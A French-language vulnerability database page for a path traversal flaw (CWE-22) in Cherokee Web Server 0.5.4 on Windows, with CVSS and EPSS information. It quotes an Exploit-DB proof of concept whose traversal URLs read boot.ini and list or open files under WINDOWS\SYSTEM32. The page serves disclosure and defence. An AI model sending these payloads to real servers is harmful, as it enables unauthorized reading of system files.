Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE-22 |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
5 |
|
AV:N/AC:L/Au:N/C:P/I:N/A:N |
nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 9873
Date de publication : 2009-10-27 23h00 +00:00
Auteur : Dr_IDE
EDB Vérifié : Yes
############################################################
#
# Cherokee Web Server <= 0.5.4 Directory Traversal Exploit
# Found By: Dr_IDE
# Tested On: Windows XPSP3
# Download: www.cherokee-project.com/download/windows
#
############################################################
- Description -
Cherokee Web Server <= 0.5.4 is a Windows based HTTP server. This is the latest
version of the application available.
Cherokee Web Server <= 0.5.4 is vulnerable to remote directory traversal attack by the
following means.
Default webroot is C:\Program Files\Cherokee\www [3 levels deep] adjust accordingly.
- Technical Details -
http://[webserver IP]/[\../]
http://172.16.2.101/\../\../\../boot.ini
http://172.16.2.101/\../\../\../WINDOWS\SYSTEM32 <- Full Directory Listings through Browser
http://172.16.2.101/\../\../\../WINDOWS\SYSTEM32\calc.exe <- File access in context of web browser instance
#[pocoftheday.blogspot.com]
Products Mentioned
Configuraton 0
Cherokee>>Cherokee_httpd >> Version 0.5.4
Microsoft>>Windows >> Version *
Références